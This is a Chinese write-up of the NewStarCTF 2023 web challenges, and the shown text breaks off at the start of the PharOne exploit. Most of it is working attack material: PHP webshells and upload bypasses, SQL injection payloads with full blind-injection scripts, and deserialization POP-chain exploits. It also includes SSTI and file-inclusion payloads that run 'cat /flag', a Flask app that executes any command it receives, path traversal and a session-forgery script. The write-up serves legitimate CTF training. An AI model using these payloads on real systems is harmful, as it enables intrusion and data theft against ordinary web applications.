[NewStarCTF 2023] web题解

文章目录

---

WEEK1

泄漏的秘密

打开题目，提示有敏感信息泄露
直接扫一下目录，发现有

./www.zip

访问然后下载下来，解压到桌面

源码和robots.txt分别是两部分flag

Begin of Upload

右键看下源码，发现对上传文件后缀名有检测
这里的检测是后缀名只需要出现合法的就行
我们上传1.jpg的一句话木马
然后抓包修改文件名为

1.jpg.php

上传成功，然后命令执行得到flag

Begin of HTTP

打开题目，按照要求一步步来
先是GET传参，随便给个值
然后是POST传参，参数值藏在源码处
然后分别是修改cookie为ctfer；修改浏览器为NewStarCTF2023；修改Referer为newstarctf.com

最后一步只能bp抓包修改为127.0.0.1
（这里用XFF不行，我用的是X-Real-IP）

ErrorFlask

打开题目，提示我们传参两个数，然后帮我们计算
我们随便传两个数
告诉我们不是ssti，后面还有计算结果
提示flag在源码
我们修改一下其中一个为字母，让其出现报错
果然出现了

/app/app.py

源码，得到flag

Begin of PHP

源码

 <?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
} 

分析一下

1. level 1利用弱比较md5值相等
2. level 2利用MD5和sha1函数无法处理数组，进行数组绕过
3. level 3同样利用数组绕过
4. level 4利用php弱类型比较
5. level 5则是利用key3数组绕过正则匹配；利用extract()函数的变量覆盖漏洞，传入非空字符即可

得到flag

R!C!E!

源码

 <?php
highlight_file(__FILE__);
if(isset($_POST['password'])&&isset($_POST['e_v.a.l'])){
    $password=md5($_POST['password']);
    $code=$_POST['e_v.a.l'];
    if(substr($password,0,6)==="c4d038"){
        if(!preg_match("/flag|system|pass|cat|ls/i",$code)){
            eval($code);
        }
    }
} 

分析一下，第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038；第二个if语句是PHP变量名解析特性和简单的命令执行过滤
首先利用脚本爆破出该数

import hashlib

prefix = "c4d038"  # 目标MD5值的前六位
prefix_bytes = prefix.encode()  # 将前缀转换为字节串

for i in range(100000000):
    b = i.to_bytes(22, 'big')
    m = hashlib.md5(str(i).encode()).hexdigest()
    
    if m.startswith(prefix):
        print(i)
        print(m)
        break

爆出来为114514
然后是利用php的解析特性，

[

会被解析成下划线

_

；和反引号去绕过对system函数的过滤，反斜杠绕过flag，tac替换cat命令
payload

password=114514&e[v.a.l=echo `tac /fla\g`;

得到flag

EasyLogin

打开题目发现是登录框，尝试注册admin
发现用户已存在
我们随便注册一个用户为hacker，密码为123456
登录并抓包，发现密码是MD5加密的
然后放行，发现中途跳转一个php界面
我们丢到重放器，发现是页面302状态，并且出现了提示

我这里因为版本问题，我保存下来用vscode打开
按照提示，果然没有第七行（成功被骗）
结合前面解题思路，老老实实爆破密码

打开bp，payload处理修改一下
爆出对应的MD5值，丢到在线网站得到密码为000000

然后就是登录进入终端
ctrl+c然后ctrl+d退出执行的程序chat

没什么发现，我们刚刚在登陆抓包已经知道中途会跳转
同样试试
结果成功抓到这个重定向的php页面
得到flag

WEEK2

游戏高手

打开题目，发现是小游戏（题目跟最近打的SHCTF比较像）
查看下js代码
发现获得胜利的条件是分数大于100000
我们在控制台输入下面语句

var gameScore = 10000000;
gameover(); 

回车然后得到flag

include 0。0

源码

 <?php
highlight_file(__FILE__);
// FLAG in the flag.php
$file = $_GET['file'];
if(isset($file) && !preg_match('/base|rot/i',$file)){
    @include($file);
}else{
    die("nope");
}
?> 

简单的文件包含，这里过滤了常见的转换过滤器base和rot
我们可以用

convert.iconv.UTF-8.UTF-16

payload

?file=php://filter/read=convert.iconv.UTF-8.UTF-16/resource=flag.php

得到flag

ez_sql

进来随便点一个，发现有参数id
我们先fuzz测试一下过滤了什么
抓包，随便用一个字典

发现select被过滤了，那么我们用大小写绕过

首先爆一下字段数

?id=-1' union SelECt 1,2,3,4,5 --+

发现字段数为5
爆库名

?id=-1' union SelECt database(),2,3,4,5 --+

然后经过再次测试，发现

information_schema.tables

和

where

都被过滤了
这里用

mysql.innodb_table_stats

和

wHere

代替
（多次尝试，发现回显的位置在5而不是1，开始卡了很久没回显）
爆表名

?id=-1' union SelECt 1,2,3,4,group_concat(table_name) from mysql.innodb_table_stats wHere '1 --+

因为我们用的是

mysql.innodb_table_stats

，我们无法查到列名
所以继续用无列名注入

?id=-1' union SelECt 1,2,3,4,group_concat(`1`) from (SelECt 1 union SelECt * from ctf.here_is_flag)a wHere '1 --+

得到flag

Unserialize？

源码

 <?php
highlight_file(__FILE__);
// Maybe you need learn some knowledge about deserialize?
class evil {
    private $cmd;

    public function __destruct()
    {
        if(!preg_match("/cat|tac|more|tail|base/i", $this->cmd)){
            @system($this->cmd);
        }
    }
}

@unserialize($_POST['unser']);
?> 

由于是private成员变量，所以序列化后长度会加2，多两个空白符
exp

<?php
class evil {
    private $cmd;
    function __construct($cmd1){
        $this->cmd=$cmd1;
    }
}

$a=new evil('ls /');
echo serialize($a);
?> 

手动添加%00
得到flag

Upload again!

打开题目
先上传最普通的马

1.php

，发现被检测了

我们尝试修改下后缀为

.jpg

，发现还是不行

在后面尝试修改MIME以及文件头，都不能绕过
猜测是对一句话木马的

<?

过滤，那么我们修改为js马

<script language="php">eval($_POST['shell']);</script>

发现可以上传，不过没有被解析成php

那么我们可以用

.htaccess

配置文件攻击，让jpg文件被解析成php
首先创建

.htaccess文件

，写入

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

上传成功后，上传名为

1.jpg

的js马

命令执行一下
得到flag

R!!C!!E!!

打开题目，提示有信息泄露

这里我是dirsearch扫了一下目录（扫了很久）
扫完后翻翻发现有git泄露
直接用工具
先运行工具，然后访问

./.git/

源码如下

<?php
highlight_file(__FILE__);
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {
    if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){
        eval($_GET['star']);
    }
}

一眼无参RCE，然后过滤了很多函数
这里我们用的是

getallheaders()函数

我们先看看http头部信息

?star=print_r(getallheaders());

然后我们选择添加命令在User-Agent那里
payload

?star=eval(next(getallheaders()));

得到flag

WEEK3

Include 🍐

源码

 <?php
    error_reporting(0);
    if(isset($_GET['file'])) {
        $file = $_GET['file'];
        
        if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
            die('hacker!');
        }
        
        include($file.".php");
        # Something in phpinfo.php!
    }
    else {
        highlight_file(__FILE__);
    }
?> 

分析一下，有文件包含漏洞，将变量和

.php

拼接，但是过滤了几个重要的伪协议。按照它的提示到

./phpinfo.php

看看，发现有假flag，不过给了hint让我们看看register_argc_argv（不了解的可以百度）。我们再在

./phpinfo.php

搜一下，发现选项是on
那么存在漏洞，具体方法为利用pearcmd.php本地文件包含

首先要知道在pearcmd.php中

&

符无发分割参数，真正能分割参数的是

+

；然后就是利用的命令为config-create，其包括两个参数，一个是绝对路径，还有保存配置文件的文件名；并且第一个参数会被写进到文件里，我们借此实现命令执行
payload

?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=@eval($_POST['cmd']);?>+shell.php

注：由于源码会拼接

.php

，所以为pearcmd

bp抓包发送
然后访问

./shell.php

得到flag

medium_sql

可以先bp抓包，fuzz测试一下

过滤的可以用大小写绕过，然后提示了不能联合查询
我们尝试布尔盲注

?id=TMP0919' And if(1>0,1,0)%23

注：#为url编码过的

然后修改一下

?id=TMP0919' And if(1<0,1,0)%23

可以发现当正确时有回显，错误时无回显，可以用布尔盲注
脚本如下（菜鸡本人写的）

import requests
import string

host = "http://fad66500-0807-4ead-8cad-dbbe48fd82cc.node4.buuoj.cn:81/?id=TMP0919"

def DBname():  
    global host
    flag=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #--库名
            payload = "' And if(Ascii(Substr(database(),{i},1))>{mid},1,0)%23".format(i=i, mid=mid)
            res = requests.get(host + payload)

            if 'Physics' in res.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32 or mid == 127:
            break

        flag += chr(mid)
        i += 1
    print("数据库名为："+flag)

def TBname():  
    global host
    flag=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #--表名
            payload = "' And if(Ascii(Substr((Select Group_concat(table_name) From infOrmation_schema.tables Where Table_schema='ctf'),{i},1))>{mid},1,0)%23".format(i=i, mid=mid)
            res = requests.get(host + payload)

            if 'Physics' in res.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32 or mid == 127:
            break

        flag += chr(mid)
        i += 1
    print("数据表名为："+flag)

def CLname():  
    global host
    flag=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #--列名
            payload = "' And if(Ascii(Substr((Select Group_concat(column_name) From infOrmation_schema.columns Where Table_name='here_is_flag'),{i},1))>{mid},1,0)%23".format(i=i, mid=mid)
            res = requests.get(host + payload)

            if 'Physics' in res.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32 or mid == 127:
            break

        flag += chr(mid)
        i += 1
    print("数据列名为："+flag)

def Valname():  
    global host
    flag=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            #--报数据
            payload = "' And if(Ascii(Substr((Select Group_concat(flag) From here_is_flag),{i},1))>{mid},1,0)%23".format(i=i, mid=mid)
            res = requests.get(host + payload)

            if 'Physics' in res.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32 or mid == 127:
            break

        flag += chr(mid)
        i += 1
    print("数据为："+flag)

DBname()
TBname()
CLname()
Valname()

运行脚本得到flag

POP Gadget

源码

 <?php
highlight_file(__FILE__);

class Begin{
    public $name;

    public function __destruct()
    {
        if(preg_match("/[a-zA-Z0-9]/",$this->name)){
            echo "Hello";
        }else{
            echo "Welcome to NewStarCTF 2023!";
        }
    }
}

class Then{
    private $func;

    public function __toString()
    {
        ($this->func)();
        return "Good Job!";
    }

}

class Handle{
    protected $obj;

    public function __call($func, $vars)
    {
        $this->obj->end();
    }

}

class Super{
    protected $obj;
    public function __invoke()
    {
        $this->obj->getStr();
    }

    public function end()
    {
        die("==GAME OVER==");
    }
}

class CTF{
    public $handle;

    public function end()
    {
        unset($this->handle->log);
    }

}

class WhiteGod{
    public $func;
    public $var;

    public function __unset($var)
    {
        ($this->func)($this->var);    
    }
}

@unserialize($_POST['pop']); 

pop链子

Begin::__destruct -> Then::toString -> Super::__invoke -> Handle::__call -> CTF::end -> WhiteGod::__unset

由于链子调用中成员属性有private和protected
我们用construct方法去调用链子，最后再使用url编码绕过
exp

<?php
class Begin{    
    public $name;    
    public function __construct($a)    
    {        
        $this->name = $a;    
    }
}
class Then{    
    private $func;    
    public function __construct($a)    
    {        
        $this->func= $a;    
    }
}
class Handle{    
    protected $obj;    
    public function __construct($a)    
    {        
        $this->obj = $a;    
    }
}
class Super{    
    protected $obj;    
    public function __construct($a)    
    {        
        $this->obj = $a;    
    }
}
class CTF{    
    public $handle;    
    public function __construct($a)    
    {        
        $this->handle = $a;    
    }
}
class WhiteGod{    
    public $func;    
    public $var;    
    public function __construct($a, $b)    
    {        
        $this->func = $a;        
        $this->var = $b;    
    }
}
$a = new Begin(new Then(new Super(new Handle(new CTF(new WhiteGod("readfile","/flag"))))));
echo urlencode(serialize($a));

得到flag

GenShin

考点：ssti

在响应头找到hint

访问，fuzz测试一下
发现过滤了

{{}}，'，request，init，lipsum，popen

那么我们使用

{%print()%}

绕过

{{}}

，enter代替init，至于popen则可以字符串拼接（虽然整个payload都直接可以拼接）

我们查找下能利用的

查找

<class 'os._wrap_close'>

，在第132个
payload

{%print("".__class__.__bases__[0].__subclasses__()[132].__enter__.__globals__["pop"+"en"]("cat /flag").read())%}

得到flag

OtenkiGirl

考点：js原型链污染

题目给了源码，我们先看app.js

const env = global.env = (process.env.NODE_ENV || "production").trim();
const isEnvDev = global.isEnvDev = env === "development";
const devOnly = (fn) => isEnvDev ? (typeof fn === "function" ? fn() : fn) : undefined
const CONFIG = require("./config"), DEFAULT_CONFIG = require("./config.default");
const PORT = CONFIG.server_port || DEFAULT_CONFIG.server_port;

const path = require("path");
const Koa = require("koa");
const bodyParser = require("koa-bodyparser");

const app = new Koa();

app.use(require('koa-static')(path.join(__dirname, './static')));
devOnly(_ => require("./webpack.proxies.dev").forEach(p => app.use(p)));
app.use(bodyParser({
    onerror: function (err, ctx) {
        // If the json is invalid, the body will be set to {}. That means, the request json would be seen as empty.
        if (err.status === 400 && err.name === 'SyntaxError' && ctx.request.type === 'application/json') {
            ctx.request.body = {}
        } else {
            throw err;
        }
    }
}));

[
    "info",
    "submit"
].forEach(p => { p = require("./routes/" + p); app.use(p.routes()).use(p.allowedMethods()) });

app.listen(PORT, () => {
    console.info(`Server is running at port ${PORT}...`);
})

module.exports = app;

简单分析一下，就是给了两个路由，分别是

./info

和

./submit

然后我们跟踪到route的info.js

const Router = require("koa-router");
const router = new Router();
const SQL = require("./sql");
const sql = new SQL("wishes");
const CONFIG = require("../config")
const DEFAULT_CONFIG = require("../config.default")

async function getInfo(timestamp) {
    timestamp = typeof timestamp === "number" ? timestamp : Date.now();
    // Remove test data from before the movie was released
    let minTimestamp = new Date(CONFIG.min_public_time || DEFAULT_CONFIG.min_public_time).getTime();
    timestamp = Math.max(timestamp, minTimestamp);
    const data = await sql.all(`SELECT wishid, date, place, contact, reason, timestamp FROM wishes WHERE timestamp >= ?`, [timestamp]).catch(e => { throw e });
    return data;
}

router.post("/info/:ts?", async (ctx) => {
    if (ctx.header["content-type"] !== "application/x-www-form-urlencoded")
        return ctx.body = {
            status: "error",
            msg: "Content-Type must be application/x-www-form-urlencoded"
        }
    if (typeof ctx.params.ts === "undefined") ctx.params.ts = 0
    const timestamp = /^[0-9]+$/.test(ctx.params.ts || "") ? Number(ctx.params.ts) : ctx.params.ts;
    if (typeof timestamp !== "number")
        return ctx.body = {
            status: "error",
            msg: "Invalid parameter ts"
        }

    try {
        const data = await getInfo(timestamp).catch(e => { throw e });
        ctx.body = {
            status: "success",
            data: data
        }
    } catch (e) {
        console.error(e);
        return ctx.body = {
            status: "error",
            msg: "Internal Server Error"
        }
    }
})

module.exports = router;

代码很长，但是主要部分就是getInfo函数

let minTimestamp = new Date(CONFIG.min_public_time || DEFAULT_CONFIG.min_public_time).getTime();

这行代码初始化一个minTimestamp变量。它从配置对象CONFIG中获取min_public_time属性的值，如果不存在则使用默认配置对象DEFAULT_CONFIG中的min_public_time属性的值。然后，通过new Date()构造函数将该时间转换为一个日期对象，并使用getTime()方法获取其对应的时间戳。

而当我们跟踪到config.js时发现并没有配置该属性，所以属性的值为config.default.js中的

module.exports = {
    app_name: "OtenkiGirl",
    default_lang: "ja",
}

module.exports = {
    app_name: "OtenkiGirl",
    default_lang: "ja",
    min_public_time: "2019-07-09",
    server_port: 9960,
    webpack_dev_port: 9970
}

那么我们知道getInfo对timestamp进行了一次过滤，使得所返回的数据不早于配置文件config中的min_public_time，猜测flag在这个min_public_time之前

所以我们可以利用原型链污染使得该值在2019-07-09之前即可
我们知道上传的为json格式
payload

{  
    "contact": "test",  
    "reason": "test",  
    "__proto__": {    
        "min_public_time": "1001-01-01"  
    }
}

污染成功
再次访问，得到flag
（如果不成功。清除下网站cookie再刷新）

WEEK4

逃

考点：字符串逃逸

源码

<?php
highlight_file(__FILE__);
function waf($str){
    return str_replace("bad","good",$str);
}

class GetFlag {
    public $key;
    public $cmd = "whoami";
    public function __construct($key)
    {
        $this->key = $key;
    }
    public function __destruct()
    {
        system($this->cmd);
    }
}

unserialize(waf(serialize(new GetFlag($_GET['key']))));

分析一下，首先命令执行对应的参数为cmd，而实例化时可控的对象为key值，题目进行反序列化的时候我们只能通过get传参去控制key，结合waf函数可以字符替换，考虑用字符串逃逸

我们本地测试下，如果传入key值为a

<?php
class GetFlag {
    public $key='a';
    public $cmd = "whoami";

}
$a=new GetFlag();
echo serialize($a);

那么序列化后的结果为

O:7:"GetFlag":2:{s:3:"key";s:1:"a";s:3:"cmd";s:6:"whoami";}

由于cmd的值不可控，我们尝试把cmd的值写到key里面，也就是将字符串

";s:3:"cmd";s:10:"cat /flag";}

写进去

字符串就变成如下

O:7:"GetFlag":2:{s:3:"key";s:1:"a";s:3:"cmd";s:9:"cat /flag";}";s:3:"cmd";s:6:"whoami";}

然后我们计算一下后面被挤掉的部分字符串

a";s:3:"cmd";s:6:"whoami";}

，长度为26，那么我们就需要26个bad被good替换的字符长度差1，再加上

whoami

变成

cat /flag

的长度差3，总共需要29个bad

所以最终构造的payload如下

O:7:"GetFlag":2:{s:3:"key";s:117:""badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:9:"cat /flag";}";s:3:"cmd";s:6:"whoami";}

也就是说上传key为

"badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:9:"cat /flag";}

得到flag

More Fast

考点：GC回收机制提前触发__destruct()

源码

<?php
highlight_file(__FILE__);

class Start{
    public $errMsg;
    public function __destruct() {
        die($this->errMsg);
    }
}

class Pwn{
    public $obj;
    public function __invoke(){
        $this->obj->evil();
    }
    public function evil() {
        phpinfo();
    }
}

class Reverse{
    public $func;
    public function __get($var) {
        ($this->func)();
    }
}

class Web{
    public $func;
    public $var;
    public function evil() {
        if(!preg_match("/flag/i",$this->var)){
            ($this->func)($this->var);
        }else{
            echo "Not Flag";
        }
    }
}

class Crypto{
    public $obj;
    public function __toString() {
        $wel = $this->obj->good;
        return "NewStar";
    }
}

class Misc{
    public function evil() {
        echo "good job but nothing";
    }
}

$a = @unserialize($_POST['fast']);
throw new Exception("Nope");

pop链

Start.__destruct() --> Crypto.__toString() --> Reverse.__get() --> Pwn.__invoke() --> Web.evil() 

整个链子逻辑很清晰，关键考点就是开头的这一步，由于题目会抛出异常，导致__destruct()方法不能触发，所以我们要进行绕过，下面对绕过方法解释下

GC回收机制

在PHP中，使用

引用计数

和

回收周期

来自动管理内存对象的，当一个变量被设置为

NULL

，或者没有任何指针指向时，它就会被变成垃圾，被

GC

机制自动回收掉那么这里的话我们就可以理解为，当一个对象没有被引用时，就会被

GC

机制回收，在回收的过程中，它会自动触发

_destruct

方法，而这也就是我们绕过抛出异常的关键点。

也就是在最后序列化前进行

$A=array($a,NULL);

这样的步骤
exp如下

<?php
class Start{
    public $errMsg;
}

class Pwn{
    public $obj;
}

class Reverse{
    public $func;
}

class Web{
    public $func;
    public $var;
}

class Crypto{
    public $obj;
}

class Misc{

}

$a=new Start();
$b=new Crypto();
$c=new Reverse();
$d=new Pwn();
$e=new Web();
$a->errMsg=$b;
$b->obj=$c;
$c->func=$d;
$d->obj=$e;
$e->func='system';
$e->var="cat /f*";
$A=array($a,NULL);
echo serialize($A);

运行结果

a:2:{i:0;O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:7:"cat /f*";}}}}}i:1;N;}

将最后的

i:1

改为

i"0

即可，得到flag

midsql

考点：时间盲注

fuzz测试一下，发现只过滤了空格，用/**/替换
然后测试，发现可以时间盲注

?id=1/**/and/**/(1,sleep(5),3)#

脚本如下

import requests
import time

chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz,}{-'
database = ''
table = ''
column = ''
flag = ''

global DB_length
global TB_length
global CL_length

#爆数据库
for l in range(1,20):
    Url = 'http://aa747dea-4776-4d4f-9c3f-6846c5f580aa.node4.buuoj.cn:81/?id=1/**/and/**/if(length(database())>{0},1,sleep(3))#'
    UrlFormat = Url.format(l)      #format（）函数使用
    start_time0 = time.time()          #发送请求前的时间赋值
    requests.get(UrlFormat)
    if  time.time() - start_time0 > 2:    #判断正确的数据库长度
            print('database长度为：' + str(l))
            global DB_length 
            DB_length = l    #把数据库长度赋值给全局变量
            break
    else:
        pass
for i in range(1,DB_length+1):
    for char in chars:
        charAscii = ord(char) #char转换为ascii
        url = 'http://aa747dea-4776-4d4f-9c3f-6846c5f580aa.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr(database(),{0},1))>{1},1,sleep(3))#'
        urlformat = url.format(i,charAscii)
        start_time = time.time()
        requests.get(urlformat)
        if  time.time() - start_time > 2:
            database+=char
            print('database第{}个字符：{}'.format(i, database))
            break
        else:
            pass
print('database： ' + database)

#爆表
for l in range(1,20):
    Url = "http://aa747dea-4776-4d4f-9c3f-6846c5f580aa.node4.buuoj.cn:81/?id=1/**/and/**/if(length((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like('ctf')))>{0},1,sleep(3))#"
    UrlFormat = Url.format(l)      
    start_time0 = time.time()          
    requests.get(UrlFormat)
    if  time.time() - start_time0 > 2:    
            print('table长度为：' + str(l))
            global TB_length 
            TB_length = l    
            break
    else:
        pass
for i in range(1,TB_length+1):
    for char in chars:
        charAscii = ord(char) #char转换为ascii
        url = "http://aa747dea-4776-4d4f-9c3f-6846c5f580aa.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like('ctf')),{0},1))>{1},1,sleep(3))#"
        urlformat = url.format(i,charAscii)
        start_time = time.time()
        requests.get(urlformat)
        if  time.time() - start_time > 2:
            table+=char
            print('table第{}个字符：{}'.format(i, table))
            break
        else:
            pass
print('table： ' + table)

#爆列
for l in range(1,20):
    Url = "http://aa747dea-4776-4d4f-9c3f-6846c5f580aa.node4.buuoj.cn:81/?id=1/**/and/**/if(length((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like('items')))>{0},1,sleep(3))#"
    UrlFormat = Url.format(l)      
    start_time0 = time.time()          
    requests.get(UrlFormat)
    if  time.time() - start_time0 > 2:    
            print('column长度为：' + str(l))
            global CL_length 
            CL_length = l    
            break
    else:
        pass
for i in range(1,CL_length+1):
    for char in chars:
        charAscii = ord(char) #char转换为ascii
        url = "http://aa747dea-4776-4d4f-9c3f-6846c5f580aa.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like('items')),{0},1))>{1},1,sleep(3))#"
        urlformat = url.format(i,charAscii)
        start_time = time.time()
        requests.get(urlformat)
        if  time.time() - start_time > 2:
            column+=char
            print('column第{}个字符：{}'.format(i, column))
            break
        else:
            pass
print('column： ' + column)

#爆数据
for i in range(1,80):
    for char in chars:
        charAscii = ord(char) #char转换为ascii
        url = "http://aa747dea-4776-4d4f-9c3f-6846c5f580aa.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/group_concat(id,name,price)/**/from/**/items),{0},1))>{1},1,sleep(3))#"
        urlformat = url.format(i,charAscii)
        start_time = time.time()
        requests.get(urlformat)
        if  time.time() - start_time > 2:
            flag+=char
            print('flag第{}个字符：{}'.format(i, flag))
            break
        else:
            pass
print('flag： ' + flag)

flask disk

打开题目，有三个链接
分别是查看文件，上传文件，输入pin码进入

admin manage

访问admin manage发现要输入pin码，说明flask开启了debug模式。flask开启了debug模式下，app.py源文件被修改后会立刻加载。所以只需要上传一个能rce的app.py文件把原来的覆盖，就可以了。
(注：语法不能出错)

from flask import Flask,request
import os
app = Flask(__name__)
@app.route('/')
def index():    
    try:        
        cmd = request.args.get('cmd')        
        data = os.popen(cmd).read()        
        return data    
    except:        
        pass    
        
    return "1"
if __name__=='__main__':    
    app.run(host='0.0.0.0',port=5000,debug=True)

上传成功后，直接在跟路由命令执行

InjectMe

考点：session伪造，ssti

下载附件，发现是泄露了目录

./app

打开题目，给了download的部分源码
分析一下，

./download

路由下，接受GET参数file，如果没有则filename为空值，然后是过滤了

../

，由于这里是替换为空，可以绕过。然后拼接路径，如果存在则返回

结合Dockerfile泄露的目录，可以猜到运行文件，直接目录穿越读取源码

/download?file=..././..././..././app/app.py

源码如下

import os
import re

from flask import Flask, render_template, request, abort, send_file, session, render_template_string
from config import secret_key

app = Flask(__name__)
app.secret_key = secret_key

@app.route('/')
def hello_world():  # put application's code here
    return render_template('index.html')

@app.route("/cancanneed", methods=["GET"])
def cancanneed():
    all_filename = os.listdir('./static/img/')
    filename = request.args.get('file', '')
    if filename:
        return render_template('img.html', filename=filename, all_filename=all_filename)
    else:
        return f"{str(os.listdir('./static/img/'))} <br> <a href=\"/cancanneed?file=1.jpg\">/cancanneed?file=1.jpg</a>"

@app.route("/download", methods=["GET"])
def download():
    filename = request.args.get('file', '')
    if filename:
        filename = filename.replace('../', '')
        filename = os.path.join('static/img/', filename)
        print(filename)
        if (os.path.exists(filename)) and ("start" not in filename):
            return send_file(filename)
        else:
            abort(500)
    else:
        abort(404)

@app.route('/backdoor', methods=["GET"])
def backdoor():
    try:
        print(session.get("user"))
        if session.get("user") is None:
            session['user'] = "guest"
        name = session.get("user")
        if re.findall(
                r'__|{{|class|base|init|mro|subclasses|builtins|globals|flag|os|system|popen|eval|:|\+|request|cat|tac|base64|nl|hex|\\u|\\x|\.',
                name):
            abort(500)
        else:
            return render_template_string(
                '竟然给<h1>%s</h1>你找到了我的后门，你一定是网络安全大赛冠军吧！😝 <br> 那么 现在轮到你了!<br> 最后祝您玩得愉快!😁' % name)
    except Exception:
        abort(500)

@app.errorhandler(404)
def page_not_find(e):
    return render_template('404.html'), 404

@app.errorhandler(500)
def internal_server_error(e):
    return render_template('500.html'), 500

if __name__ == '__main__':
    app.run('0.0.0.0', port=8080)

分析一下
存在

./backdoor

路由，获取session中user的值，如果没有赋值为guest，有的话进行正则匹配（此处存在ssti漏洞）
根据源码，secret_key在config.py里，我们可以访问下载得到key

获取key

/download?file=..././..././..././app/config.py

然后解密

由于过滤了很多，这里用八进制编码绕过
脚本如下

import re
import requests
import subprocess
# 把这个下载了，需要使用里面的flask-session-cookie-manager3.py
# # https://github.com/noraj/flask-session-cookie-manager

def string_to_octal_ascii(s):
    octal_ascii = ""
    for char in s:
        char_code = ord(char)
        octal_ascii += "\\\\" + format(char_code, '03o')
        # octal_ascii += "\\\\" + format(char_code, 'o')    
    return octal_ascii
secret_key = "y0u_n3ver_k0nw_s3cret_key_1s_newst4r"
# payload = "{%print(7*7)%}"
# payload = "{%print(\"\"\\\\u005f\\\\u005f\"\")%}"
# payload = "{%print(\"\"\\\\x5f\\\\x5f\"\")%}"

eval_shell = "\"\""+string_to_octal_ascii("__import__(\"os\").popen(\"cat /*\").read()")+"\"\""
print(eval_shell)
# docker部署&windows运行payload
# {{x.__init__.__globals__.__builtins__.eval('__import__("os").popen("dir").read()')}}
payload = "{{%print(xxx|attr(\"\"\\\\137\\\\137\\\\151\\\\156\\\\151\\\\164\\\\137\\\\137\"\")|attr(\"\"\\\\137\\\\137\\\\147\\\\154\\\\157\\\\142\\\\141\\\\154\\\\163\\\\137\\\\137\"\")|attr(\"\"\\\\137\\\\137\\\\147\\\\145\\\\164\\\\151\\\\164\\\\145\\\\155\\\\137\\\\137\"\")(\"\"\\\\137\\\\137\\\\142\\\\165\\\\151\\\\154\\\\164\\\\151\\\\156\\\\163\\\\137\\\\137\"\")|attr(\"\"\\\\137\\\\137\\\\147\\\\145\\\\164\\\\151\\\\164\\\\145\\\\155\\\\137\\\\137\"\")(\"\"\\\\145\\\\166\\\\141\\\\154\"\")({0}))%}}".format(eval_shell)
print(payload)
command = "python flask_session_cookie_manager3.py encode -s \"{0}\" -t \"{{'user':'{1}'}}\"".format(secret_key,payload)
print(command)

session_data = subprocess.check_output(command, shell=True)
print(session_data)
# linux和windows换行不一样，linux是去掉最后一个，windows是最后两个。
session_data = session_data[:-2].decode('utf-8')
# session_data = session_data[:-1].decode('utf-8')
print(session_data)

url = "http://127.0.0.1:8080/backdoor"
cookies = {"session": session_data}
res = requests.get(url=url, cookies=cookies)
# print(res.text)
pattern = r'<h1>(.*)</h1>'
result_content = re.search(pattern, res.text, re.S)
# print(result_content)
if result_content:
    result = result_content.group(1)
    print(result)
else:
    print("something wrong!")

得到flag

PharOne

考点：Phar反序列化、gzip压缩、无回显RCE

打开题目，有文件上传功能
访问

./class.php

，得到源码

 <?php
highlight_file(__FILE__);
class Flag{
    public $cmd;
    public function __destruct()
    {
        @exec($this->cmd);
    }
}
@unlink($_POST['file']); 

结合文件上传，考虑phar反序列化；同时还是无回显RCE，用写入马和反弹shell都行

用普通的phar文件上传发现不行（jpg才行）
修改然后上传发现被正则匹配
绕过正则匹配，这里用的是gzip压缩的方法

方法一 写马

exp

<?php
